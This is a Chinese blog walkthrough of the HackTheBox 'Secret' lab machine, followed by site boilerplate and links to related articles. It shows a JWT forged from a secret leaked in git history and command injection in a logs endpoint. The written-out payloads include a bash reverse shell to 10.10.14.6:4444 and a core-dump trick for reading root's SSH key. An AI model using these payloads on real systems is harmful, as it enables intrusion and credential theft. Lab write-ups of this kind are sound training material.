Linux/Secret

已于 2024-03-27 10:03:19 修改
阅读量972 收藏 9
点赞数 13
分类专栏: HackTheBox 文章标签: web安全 网络安全
于 2024-03-15 15:14:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45557138/article/details/136740522
版权

6cc68e3b44b246e69fa43788b54d19c7.png

Enumeration

nmap

第一次扫描发现系统对外开放了22,80和3000端口,端口详细信息如下

3264b502868e4157924127e2f6e53261.png

可以看到22端口对应的是ssh服务,80和3000都是http服务,80端口使用nginx,3000使用了Node.js

TCP/80

可以先从80端口开始探索,看起来是一个文档网站,叫DUMBDocs

a2fadcd971d64495b1e02d2df8c3a370.png

再往下可以看到有一些功能,introduction还提到了使用JWT token认证

39425ee90fb84078a446066cfc7fa1d9.png

在最下面可以下载源代码

0020367ff2dd48dfa5078bc19b5dbec3.png

将文件解压缩后打开,发现里面有.git目录,实际上这是一个git仓库,可以查看日志看看哪些内容做了改动

dbf1e547f37147f9b1e19279ea80f84a.png

可以使用git log来查看日志,日志中有一行很有趣,提到了因为安全原因删除了.env

847ceb3149e741ae83eef0e126a7ec2f.png

可以使用git show来查看当前提交与源代码之间的区别,可以看到一个TOKEN_SECRET的明文值,但是目前已经变成机密了

fdcf5bb3edca481f85867a4b0ba61664.png

查看其他提交时发现引入了/logs,目的是让管理员查看服务器上的日志,它可能会造成命令执行,file变量作为参数传递给git log时,最终会传递给exec函数去执行,因为verifytoken的存在,所以需要身份认证才能做到这一点

d3954e5c00c5482daff6658b7c9a12ce.png

查看网站源代码,在routes中有一个auth.js,在login部分,它介绍了如何为登陆成功的用户生成jwt token

00547c0a67684471929929be7f7791cb.png

利用代码中提到的三个参数,以及之前获取得到的TOKEN_SERCET,在jwt.io中创建一个jwt token

488da028923c4d9da23d67399bfb73b7.png

使用该jwt token请求logs,但是却报错了,刚才在网站查看时也发现很多接口都在/api下面,尝试添加/api,添加后没有报404,直接报了500

9ee954b17215496ab125a667e4e39aa5.png

按照刚才代码中所写,在请求logs时需要有一个参数,尝试添加?file=id,可以看到响应中cmd参数的值发生了改变,应该是git log --oneline id这个指令exec不知道该如何处理,在id前添加;即可

5e1cda9ee63e427196cdf7dccfa58758.png

将请求改为/api/logs?file=;id之后,发现响应正常,并且成功执行了指令

c3dafd4efaf14ed4b70d3cf3404fc52c.png

可以尝试执行反向shell

;bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.6/4444+0>%261'

fb0efe36815c44fea71a926ed5557ab1.png

Privilege Escalation

获取交互式shell

211ebbb56b3549fb8bbb66abc11bb6a7.png

在/opt目录下,有一个count文件,该文件是一个SUID文件,这意味着无论谁执行这个文件,都会以其所有者的身份去运行,而count属于root

83d33a90790d4284806c5ef4d4fb5ab2.png

尝试执行该文件,提示需要输入文件名,所以输入了/root/root.txt,程序统计了文件中的字数,并且提示是否保存文件

66632ac7ce60471d9245f0e3b0f0d4cd.png

code.c是程序来源,查看其他人的wp,并结合代码,可以尝试利用count二进制文件来读取ssh密钥,然后在文件处理程序被破坏前使程序崩溃,程序崩溃后,会在/var/crashes目录下创建一个core dump文件。所以,可以执行程序,然后让程序读取/root/.ssh/id_rsa密钥文件,在使用ctrl+z置于后台,发送对应信号,当重新把程序置于前台时,就会崩溃并创建转储文件

/opt/count
/root/.ssh/id_rsa
ctrl+z
kill -SIGSEGV `ps -e | grep -w "count"|awk -F ' ' '{print$1}'`
fg

按照上面的指令逐行执行

a3116215be984fd39a64b2773f51362e.png

执行上述命令后,告知核心转储已创建,现在可以使用apport-unpack和strings来提取根ssh密钥

apport-unpack /var/crash/_opt_count.1000.crash /tmp/crash_unpacked
strings /tmp/crash_unpacked/CoreDump

e2a0c2ef6b1d4b11846080b1304f1141.png

复制该密钥保存后添加权限,然后可以使用该密钥登录ssh

6f386650d73541da9cf2ec8c4ab7e64d.png

 

ve9etable
关注
  • 13
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux secret.pdf
09-30
linux secret.pdf linux 安全设置入门
Linux的/proc/self学习
unexpectedthing的博客
11-15 2634
前言 本文就之前看到的linux的/prof/self进行学习,并写关于这个知识点的wp。 Linux的/proc/self/学习 可以通过/proc/pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程
seCRT远程linux,linux http secret
weixin_28949049的博客
05-11 96
在/var/www/html创建一个secret目录,仅允许本地用户访问1,访问需要密码yum install httpd*service httpd restarttcp 80chkconfig httpd onmkdir /var/www/html/secretvim /etc/httpd/conf/httpd.confAllowOverRide AuthConfigservice http...
linux 临时文件夹设置,Linux中/tmp文件夹的访问权限问题?
weixin_30713705的博客
04-28 1468
如下:llfn--查fn”的权限llfdn--查看文件夹名为“fdn”的权限查看用户所用户的权限及相关解释:-rw-r--r--.1wy99wy99337812月2815:16license.xml其中“-rw-r--r--”表示所拥有权限,一共有十个字符。“-”:在首行表示是文件。“d”:表示是目录(directory)。“-”后面9个字符每3个字符,作为一个组。如“rw-”、“r--”、“...
Kubernetes 笔记(05)— 创建 ConfigMap/Secret 对象、分别使用环境变量Env和 Volume 配置ConfigMap/Secret 对象
wohu1104的专栏
01-14 1783
ConfigMap记录了一些Key-Value格式的字符串数据,描述字段是data,不是spec。Secret与ConfigMap很类似,也使用data保存字符串数据,但它要求数据必须是Base64编码,起到一定的保密效果。在Pod的字段中可以引用ConfigMap和Secret,把它们变成应用可以访问的环境变量。在Pod的字段中可以引用ConfigMap和Secret,把它们变成存储卷,然后在字段中加载成文件的形式。ConfigMap和Secret。
Linux下安装MySQL找不到/root/.mysql-secret
HZAOLICHENG的博客
03-16 3110
Linux下安装找不到随机密码解决办法 出现问题:安装mysql-server之后发现找不到随机密码的所在位置,以及文件夹根本不存在。 原因:之前安装过mysql,卸载文件不彻底. 解决办法 检查是否下载过 rpm -qa | grep -i mysql(输入之后出现mysql名字,复制) 检查在哪里 which mysql 先删除mysql rpm -e ( mysql名字) ...
linux操作连接工具electerm
01-21
1、支持多平台(Linux、Mac、Windows); 2、支持多国语言; 3、支持添加快速命令; 4、支持批量输入命令在一个终端或所有终端上执行; 5、作为终端 SSH / SFTP 的客户端(类似于 Xshell); 6、切换窗口可见性的...
linux 安装 minio
08-29
minio和mc资源,包括minio和mc安装脚本。安装前修改start.sh、mc_config.sh中的用户名、密码、桶名称、assess-key,secret 遮羞都修改为合适的。
加密便签工具 Secret-3.1
01-01
该版本重新定义命令,使用仿linux命令,让大家更容易使用 Tips: 输入HELP [命令] 或 H [命令]查看详情 编辑存储信息 VI 删除存储的信息 RM 查看存储的信息 LS 清空会话框 CLEAR 修改密码及加密数字 PASSWORD...
Arduino for Secret Agents.rar
01-04
Arduino初学者入门 linux攻防 黑客技术 Arduino for Secret Agents
网络安全安全事件管理处置 — 安全事件处置思路指导
享你所想
04-26 708
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 984
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
ChatGPT 网络安全秘籍(二)
龙哥盟
04-30 277
本方法中概述的原则和结构可以针对各种项目和编程语言进行定制。例如,如果您正在使用 JavaScript 开发电子商务平台,您可以调整提示中的上下文以适应该场景。
匠心精神与创新力量:构筑网络安全的新防线
weixin_51347473的博客
04-30 161
在数字化时代,随着技术的飞速发展,网络安全问题日益凸显,成为全球关注的焦点。2024年哈经开区十大匠心提名之一的亿林网络李璐昆,正是在这样的背景下,以其匠心精神和创新实践,为网络安全领域贡献了重要力量。
网络安全知识点
lv785的博客
04-26 877
概念:IPSec 是“IP 安全”的缩写,是IETF在开发 IPv6时为保证IP数据报安全而设计的,是IPv6的一个组成 部分、是IPv4的可选项,其基本目的就是把安全机制引入 IP协议。欺骗:指利用主机之间的正常信任关系,通过修改IP数据包中的源地址,以绕开主机或网络访问控制、隐藏攻击来源的攻击技术。概念:入侵检测就是对入侵行为的 检测与发现,即在计算机网络系统中的若干关键点搜集信息,通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。简要分析RSA算法的安全性得以保障的原因。
Web安全--万能密码大全+图片马合成方法
余十步的博客
04-25 420
万能密码大全:asp、aspx、php、jsp万能密码大全。
web安全】-- 命令执行漏洞详解
最新发布
m0_72286569的博客
04-30 385
命令执行漏洞是一种网络安全漏洞,它允许攻击者在受影响的系统上执行恶意命令。这种漏洞通常出现在软件应用程序或系统中,其典型示例是 Web 应用程序中的远程命令执行(RCE)漏洞。
ChatGPT 网络安全秘籍(四)
龙哥盟
04-30 531
原文:zh.annas-archive.org/md5/6b2705e0d6d24d8c113752f67b42d7d8 译者:飞龙 协议:CC BY-NC-SA 4.0 第八章:事故响应 事故响应是任何网络安全策略的关键组成部分,涉及确定、分析和缓解安全漏洞或攻击。 及时和有效地响应事故对于最小化损害和防止未来攻击至关重要。 在本章中,我们将深入探讨如何利用 ChatGPT 和 OpenAI 的 API 来增强事故响应过程的各个方面。 我们将首先探讨 ChatGPT 如何协助进行事故分析和分类,提供快
ChatGPT 网络安全秘籍(一)
龙哥盟
04-30 658
在不断发展的网络安全领域中,由 OpenAI 推出的 ChatGPT 所代表的生成式人工智能和大型语言模型LLMs)的出现,标志着一个重大的飞跃。本书致力于探索 ChatGPT 在网络安全领域的应用,从这个工具作为基本聊天界面的萌芽阶段开始,一直到它如今作为重塑网络安全方法论的先进平台的地位。最初构想为通过分析用户交互来辅助 AI 研究,ChatGPT 从其于 2022 年底的首次发布到如今的形态,仅一年多的时间就经历了一次非凡的演变。
Start server failed: please modify the configuration named api.secret in /mnt/d/Users/wanyu/swju/ZLMediaKit/release/linux/Debug/config.ini
07-27
根据提供的引用内容,问题是关于启动服务器失败的问题,需要修改配置文件中的api.secret。根据引用\[1\]和引用\[2\],可以看出在启动服务器时,会创建一个包含服务器认证信息的文件。而根据引用\[3\]中提到的问题原因,可能是由于redis服务器的访问权限问题导致无法设置键值。此外,还提到了redis访问了/etc/cron.d目录,这是一个存放定时任务脚本的目录。因此,可能需要检查配置文件中的路径是否正确,并确保redis服务器具有访问所需文件和目录的权限。 #### 引用[.reference_title] - *1* *2* [CentOS启动图形界面startx:xauth: file /root/.serverauth.25690 does not exist](https://blog.csdn.net/The_Time_Runner/article/details/102584043)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Failed opening the RDB file root (in server root dir /etc/cron.d) for saving: Permission denied](https://blog.csdn.net/weixin_46080554/article/details/103678056)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值